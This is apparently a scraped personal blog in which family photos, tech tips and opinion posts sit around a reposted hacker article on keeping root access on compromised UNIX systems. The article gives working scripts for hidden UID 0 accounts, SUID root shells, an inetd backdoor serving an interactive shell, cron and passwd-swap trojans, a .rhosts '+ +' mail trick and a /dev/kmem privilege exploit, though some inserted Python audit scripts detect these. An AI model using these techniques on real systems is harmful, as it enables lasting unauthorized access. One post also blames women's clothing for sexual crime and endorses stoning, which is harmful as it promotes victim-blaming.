it is indeed best to teach children good things from an early age, and of course with methods that catch their interest.. and not every child can be persuaded with the same method, because each child is special and has a different character.
well.. that's my report... hopefully it can be an idea for mothers who want to educate their children from an early age.
Backdoor
Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice (but, hey, this *is* the overt section...). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
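Seen from the administrator's side, methods [1] to [3] all leave marks that can be checked mechanically: a second UID 0 entry, an empty password field, or a set-UID file under /tmp. The Python below is an added example, not part of the original article; the sample passwd text is constructed from the entries the article shows, and the function names are this example's own.

```python
"""Audit a passwd file and a directory for the marks left by methods [1]-[3]."""
import os
import stat

# Constructed sample: the article's inserted entry sits mid-file, and a
# re-enabled "sync" account has been changed to UID 0.
SAMPLE_PASSWD = """\
root:x:0:0:Operator:/:/bin/csh
daemon:x:1:1::/:
EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh
sync:x:0:1::/:/bin/sync
alice:x:1001:100:Alice:/home/alice:/bin/sh
broken-line-without-fields
"""


def audit_passwd(text, allowed_uid0=("root",)):
    """Return (line_number, account, finding) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:  # the general 7-field format the article mentions
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric UID"))
            continue
        # int() so that "00" or "000" is still recognised as UID 0.
        if int(uid) == 0 and name not in allowed_uid0:
            findings.append((lineno, name, "unexpected UID 0 account"))
        if password == "":
            findings.append((lineno, name, "empty password field"))
    return findings


def find_setuid_files(directory):
    """Return sorted paths of regular files under directory with the set-UID bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(directory):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # file vanished or cannot be examined; skip it
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    with open("/etc/passwd") as handle:
        for finding in audit_passwd(handle.read()):
            print("passwd:", finding)
    for path in find_setuid_files("/tmp"):
        print("set-UID file in /tmp:", path)
```

Because the check reads every line, an entry placed in the middle of the file is found as easily as one appended at the end.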
The Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
evil 22/tcp evil
and this line to /etc/inetd.conf:
evil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
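Methods [4] and [5] both end with an inetd.conf line whose command is a shell, and [5] also adds a name to /etc/services. The following audit is an added example, not code from the article; the sample files are constructed, and the known-good baseline of services is an assumption (something an administrator would record from a clean install).

```python
"""Audit inetd.conf and services text for the changes described in [4] and [5]."""
import posixpath

SHELLS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh", "ash", "dash"}

# Constructed sample files; the two shell lines are the ones the article shows.
SAMPLE_INETD = """\
# constructed sample
ftp     stream  tcp  nowait  root  /usr/etc/ftpd    ftpd
talk    dgram   udp  wait    root  /usr/etc/ntalkd  ntalkd
daytime stream  tcp  nowait  /bin/sh  sh -i
evil    stream  tcp  nowait  /bin/sh  sh -i
echo    stream  tcp  nowait  root  internal
"""

SAMPLE_SERVICES = """\
echo     7/tcp
daytime  13/tcp
ftp      21/tcp
evil     22/tcp   evil
smtp     25/tcp   mail
talk     517/udp
"""

# Assumed known-good state, recorded before any compromise.
BASELINE_SERVICES = {
    "echo": "7/tcp", "daytime": "13/tcp", "ftp": "21/tcp",
    "smtp": "25/tcp", "talk": "517/udp",
}


def parse_services(text):
    """Map service name -> 'port/protocol' from services-format text."""
    table = {}
    for line in text.splitlines():
        tokens = line.split("#", 1)[0].split()
        if len(tokens) >= 2:
            table[tokens[0]] = tokens[1]
    return table


def audit_inetd(inetd_text, services_text, baseline):
    """Return (line_number, service, finding) tuples for suspicious inetd entries."""
    services = parse_services(services_text)
    findings = []
    for lineno, line in enumerate(inetd_text.splitlines(), start=1):
        tokens = line.split("#", 1)[0].split()
        if not tokens:
            continue
        service = tokens[0]
        if len(tokens) < 6:
            findings.append((lineno, service, "too few fields"))
            continue
        # Look at every token from the user field on, so a line with a missing
        # or shifted field (as in the article's example) is still caught.
        if any(posixpath.basename(tok) in SHELLS for tok in tokens[4:]):
            findings.append((lineno, service, "server command is a shell"))
        if "/" in tokens[4]:
            findings.append((lineno, service, "user field looks like a path"))
        if service not in services:
            findings.append((lineno, service, "service not in services file"))
        elif service not in baseline:
            findings.append((lineno, service, "service not in baseline"))
        elif services[service] != baseline[service]:
            findings.append((lineno, service, "port differs from baseline"))
    return findings


if __name__ == "__main__":
    for finding in audit_inetd(SAMPLE_INETD, SAMPLE_SERVICES, BASELINE_SERVICES):
        print(finding)
```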
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
#daemon9@netcom.com
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/sneakysneaky_passwd
make sure this exists:
#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* daemon9@netcom.com */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
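The detection the article concedes for [10], a Tripwire-style integrity check, comes down to recording a digest plus the owner and permission bits of su, login and passwd while the system is known to be clean, then comparing later. A minimal version as an added example (not Tripwire's code and not from the article); the list of paths passed in is the caller's choice.

```python
"""Minimal file-integrity baseline and comparison (illustrative, not Tripwire)."""
import hashlib
import os
import stat


def snapshot(paths):
    """Record SHA-256, permission bits, owner and size for each path."""
    records = {}
    for path in paths:
        try:
            info = os.stat(path)
            with open(path, "rb") as handle:
                digest = hashlib.sha256(handle.read()).hexdigest()
        except OSError:
            records[path] = None  # missing or unreadable
            continue
        records[path] = {
            "sha256": digest,
            "mode": stat.S_IMODE(info.st_mode),  # includes the set-UID bit
            "uid": info.st_uid,
            "size": info.st_size,
        }
    return records


def compare(baseline, current):
    """Return (path, finding) pairs for every difference from the baseline."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old == new:
            continue
        if old is None:
            findings.append((path, "not in baseline"))
        elif new is None:
            findings.append((path, "missing or unreadable"))
        else:
            for key in ("sha256", "mode", "uid", "size"):
                if old[key] != new[key]:
                    findings.append((path, key + " changed"))
    return findings


if __name__ == "__main__":
    watched = ["/bin/su", "/bin/login", "/usr/bin/passwd"]  # example paths
    for path, record in snapshot(watched).items():
        print(path, record)
```

The baseline is only useful if it is stored where an intruder with root on the audited host cannot rewrite it, for example on read-only media or another machine.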
The Esoteric
[11] /dev/kmem exploit. It represents the virtual memory of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
From The Infinity Concept Issue II
Labels:
article
BA regedit
ok m8s,
any of you that do websites and like to open .html and similar files in notepad to edit scripts, this is THE coolest windows registry edit ever
you can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually
CODE
http://www.geocities.com/ichbindeingott5/winXP-Notepad.zip
Manually: regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
add the key "notepad"
its default value should be "Open with Notepad"
now, under "notepad", add the key "Command"
its default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"
ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad
HOW BADASS IS THAT?!?!?!?
I FOUND THIS ONE ON MY OWN!!!!!!
i know this one works on XP and 2000, you can PROBABLY enter it manually on windows 9x, but i have not tested that
okay okay, i know maybe not everyone cares...but this was fun for me because i love tweaking my computer AND it makes some web design stuff easier for me :D
Labels:
article
Friday, August 5, 2011
Just trying things out...
Well... here I'm just trying things out: there's a site that supposedly pays, and one of the requirements is to post this link http://mylot.com/hbabd8685
That's about it...
myLot User Profile
Labels:
misc.
Monday, August 1, 2011
Small tut for RealMedia

You may find this helpful if you download hundreds of short episodes in rm format like me and are tired of double-clicking to open the next file.
Very easy. Use notepad to open a new file, type this inside:
file://link to file1
file://link to file2
(type as many as you want)
Close file. Rename it to FileName.rm
Then you're done!!!!
Ex:
I put my playlist file here: C:\Movies\7VNR
And the movie files are in C:\Movies\7VNR\DragonBall
Then inside my playlist file I'll have something like this:
file://DragonBall/db134.rm
file://DragonBall/db135.rm
file://DragonBall/db136.rm
file://DragonBall/db137.rm
file://DragonBall/db138.rm
Labels:
article
House plants --- part 2
These are the plants in the picture above...
My plants are a date palm and a Thai tamarind tree {still small, a little under 2 years old}
Hopefully they grow big quickly...
Labels:
pics
Inside the house....
The picture was taken in the morning on the first day of fasting, Ramadan 1432H....
Father's motorbike had already gone out a little before four o'clock - Father went to pay a condolence visit in Pacitan, leaving together with Umar...
The little ones are asleep... Mujib had his pre-dawn meal this morning, eating egg with opor as the side dish.
Labels:
pics
Nailah & Luqman
These two kids were playing while I was receiving a guest; I took this photo because they were being noisy ... just look at the faces of those two little ones
Labels:
pics
Correct thinking gets blamed
In response to the news at this link, CLICK FOR THE FULL STORY, it is true that day by day people think less and less clearly....
If we pay attention, or if a study were done, I am sure that the way a woman dresses affects the rate of sexual crime. Because by dressing immodestly {showing parts of a woman's body that arouse a normal man} it is not impossible that men imagine indecent things, and this can lead such a man {when lust has taken over his body and his clear thinking} to commit an indecent act, all the more so if there is an opportunity at that moment, for example at night when there are not many people around, or in an apartment, a hotel, etc.
When I read the news above I was sure that if people hold that women may dress however they like, it becomes fertile ground for Satan to whisper to people to give vent to their lust... it is better if he is already married... what if he is not?
Well... in Islam the laws for adulterers, rapists, etc. have already been laid down. The harshest punishment is stoning to death... this punishment is honestly very light compared with the effects/consequences that arise if the perpetrator of an indecent act is simply left to roam the earth. It is not impossible that he {after getting out of prison, for example} commits crimes again, claiming new victims, which can damage the peaceful and prosperous order of society... well, the enforcement of sharia does need to be promoted in order to attain a life that is safe and under God's blessing.
Labels:
in mind
What Flower Is This
The flower above, photographed in the morning ... I don't know the name of this flower... if you know the name of this flower, please tell me...
Labels:
pics
Saturday, July 30, 2011
terrorist?..,. killer..?
If the person who killed 90+ people in Norway was a Muslim, the Press would have declared him as a terrorist. For now though, he is just an 'Assailant ', 'Attacker' (Reuters), 'Gunman' (BBC, CNN & Al Jazeera). Looks like 'Terrorist ' is a name designated for Muslims? The US Dept of State calls it an 'Act of Violence', Not an 'Act of Terrorism' . Share this status and let the world know. Stop the hypocrisy!
"If the person who killed 90+ people in Norway were a Muslim, the press would call him a terrorist. But for now he is only called an "attacker", "assailant" (Reuters), "gunman" (BBC, CNN, & Al Jazeera). It seems the term "terrorist" is aimed only at Muslims. The United States government calls it an "act of violence", and not an "act of terrorism". ....... stop this hypocrisy!!"
Labels:
in mind
Thursday, July 28, 2011
Passion fruit
At least every week we harvest more than 5 passion fruits
Too bad hardly anyone wants to eat them.. the one who regularly makes passion fruit juice is mostly me..